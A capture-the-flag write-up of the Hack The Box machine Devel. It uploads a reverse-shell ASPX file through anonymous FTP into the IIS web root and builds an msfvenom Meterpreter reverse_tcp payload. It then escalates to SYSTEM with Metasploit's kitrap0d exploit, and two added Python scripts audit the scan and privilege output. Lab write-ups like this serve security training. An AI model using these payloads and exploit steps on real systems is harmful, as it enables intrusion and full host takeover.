Devel

joseml
4 min read · Nov 7, 2023


Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

ENUMERATION

Let's begin, as always, with an Nmap scan:

target=127.0.0.1; nmap -T4 -p$(nmap -Pn -T4 $target | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -Pn -sVC $target
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
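As an added audit example (not code from the original post), the following Python script parses the Nmap service output above and flags the exposure chain the scan reveals: anonymous FTP, the IIS default files (iisstart.htm, welcome.png, aspnet_client) showing that the FTP root is the web root, and the TRACE method. The function names, the IIS_DEFAULT_FILES set and the finding strings are my own; the sample input is the scan output above copied into a string.

```python
import re
# Constructed sample: the service lines of the Nmap scan above, not a live scan.
NMAP_OUTPUT = """\
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
"""

# IIS default web-root content; seeing it in an FTP listing means FTP root == wwwroot.
IIS_DEFAULT_FILES = {"iisstart.htm", "welcome.png", "aspnet_client"}

def parse_ports(text):
    """Return {port: {"service", "version", "scripts"}} from nmap -sVC output."""
    ports, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$", line)
        if m:
            current = int(m.group(1))
            ports[current] = {"service": m.group(2), "version": m.group(3).strip(), "scripts": []}
        elif current is not None and line.startswith("|"):
            ports[current]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports

def audit(text):
    """Flag the misconfigurations this scan exposes, in scan order."""
    ports, findings, anon_ftp, listing = parse_ports(text), [], False, set()
    for port, info in ports.items():
        for s in info["scripts"]:
            if s.startswith("ftp-anon:") and "login allowed" in s:
                anon_ftp = True
                findings.append(f"{port}/tcp: anonymous FTP login allowed")
            if "risky methods" in s and "TRACE" in s:
                findings.append(f"{port}/tcp: HTTP TRACE method enabled")
            m = re.match(r"\d\d-\d\d-\d\d \d\d:\d\d[AP]M\s+(?:<DIR>|\d+)\s+(\S+)$", s)
            if m:
                listing.add(m.group(1))
    serves_http = any(i["service"] == "http" for i in ports.values())
    if anon_ftp and serves_http and listing & IIS_DEFAULT_FILES:
        findings.append("anonymous FTP root is the IIS web root: uploaded files are served by IIS")
    return findings
```

The last finding is only raised when all three conditions hold, so a host with anonymous FTP into an unrelated directory is reported as anonymous FTP alone.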

Anonymous FTP gives us access to the IIS web root: we upload our shell.aspx there, request it over HTTP, and get a reverse shell.

EXPLOITATION

https://github.com/josemlwdf/AutoExploits/blob/main/shell.aspx

Let’s upload our reverse shell:

ftp anonymous@10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49168|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
12-05-22 11:35PM 72499 img.png
12-05-22 11:36PM 2702 shell.php
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> put /root/home/CTF/HTB/Devel/shell.aspx shell.aspx
local: /root/home/CTF/HTB/Devel/shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49169|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************| 16392 6.24 MiB/s - : - ETA
226 Transfer complete.
16392 bytes sent in 00:00 (148.66 KiB/s)
ftp>

Requesting shell.aspx on the web server sends the shell back to our nc listener:

nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.10.5 49170
Spawn Shell…
Microsoft Windows [Version 6.1.7600]
Copyright © 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami /all
whoami /all
USER INFORMATION
----------------

User Name       SID
=============== ==============================================================
iis apppool\web S-1-5-82-2971860261-2701350812-2118117159-340795515-2183480550

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
c:\windows\system32\inetsrv>
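Added example, not part of the original write-up: a Python review of the whoami /all output above that extracts the token's identity and privilege table and lists what deserves a least-privilege review. The HIGH_IMPACT set, the function names and the app-pool SID check (S-1-5-82- is the SID prefix of IIS application pool virtual accounts) are my own; the sample is a shortened copy of the output above.

```python
import re

# Constructed sample: a shortened copy of the whoami /all output above.
WHOAMI_OUTPUT = """\
USER INFORMATION
----------------
User Name       SID
=============== ========
iis apppool\\web S-1-5-82-2971860261-2701350812-2118117159-340795515-2183480550
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Privileges that let a holder act outside its own security context (my own list).
HIGH_IMPACT = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}

def parse_privileges(text):
    """Map privilege name -> State from the PRIVILEGES INFORMATION table.
    'Disabled' means not currently enabled in the token, not absent: the process
    can enable a held privilege itself, so every held privilege counts."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def review(text):
    """List the reasons this identity deserves a least-privilege review."""
    findings = []
    # S-1-5-82-* is the SID prefix of IIS application pool virtual accounts.
    m = re.search(r"^(.+?)\s+(S-1-5-82-[\d-]+)\s*$", text, re.M)
    if m:
        findings.append(f"{m.group(1)} is an IIS application pool identity")
    for name, state in sorted(parse_privileges(text).items()):
        if name in HIGH_IMPACT:
            findings.append(f"{name} held ({state})")
    return findings
```

On the output above the review reports SeAssignPrimaryTokenPrivilege as held even though whoami shows it Disabled; that state is what the process chose, not a restriction on the token.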

ROOT

There are several paths to Administrator here. I used Metasploit, but one of the Potato exploits would also have worked.

I created an ASPX Meterpreter payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=1234 -f aspx > msfshell.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2880 bytes

Then, in Metasploit, with the Meterpreter session open, I ran the local exploit suggester:

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows…
[*] 10.10.10.5 - 173 exploit checks are being tried…
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
...SNIP...
============================
 #  Name                                        Potentially Vulnerable?  Check Result
 -  ----                                        -----------------------  ------------
 1  exploit/windows/local/bypassuac_eventvwr    Yes                      The target appears to be vulnerable.
 2  exploit/windows/local/ms10_015_kitrap0d     Yes                      The service is running, but could not be validated.
 3  exploit/windows/local/ms10_092_schelevator  Yes                      The service is running, but could not be validated.
...SNIP...
[*] Post module execution completed

I will use the ms10_015_kitrap0d exploit:

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.19.228.121   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.16.9
lhost => 10.10.16.9
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Reflectively injecting payload and triggering the bug…
[*] Launching msiexec to host the DLL…
[+] Process 1188 launched.
[*] Reflectively injecting the DLL into 1188…
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.16.9:4444 -> 10.10.10.5:49163) at 2022-12-05 23:56:51 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Congratulations! We have successfully completed this machine. Thank you for reading!
